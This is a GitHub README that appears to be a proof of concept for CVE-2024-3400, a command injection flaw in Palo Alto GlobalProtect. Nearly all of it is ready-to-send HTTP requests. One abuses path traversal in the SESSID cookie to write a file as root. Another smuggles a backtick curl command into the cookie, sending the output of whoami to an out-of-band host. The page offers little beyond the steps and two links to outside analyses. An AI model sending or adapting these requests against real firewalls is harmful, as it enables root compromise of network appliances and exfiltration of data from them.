Skip to content

Latest commit

 

History

History
46 lines (27 loc) · 1.13 KB

README.md

File metadata and controls

46 lines (27 loc) · 1.13 KB
Raw

CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

send this HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image

you will create hellome1337.txt file on the server with root access

now if you try to access the files you should receive 403 insted of 404

image

Command Injection

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

More Info : https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/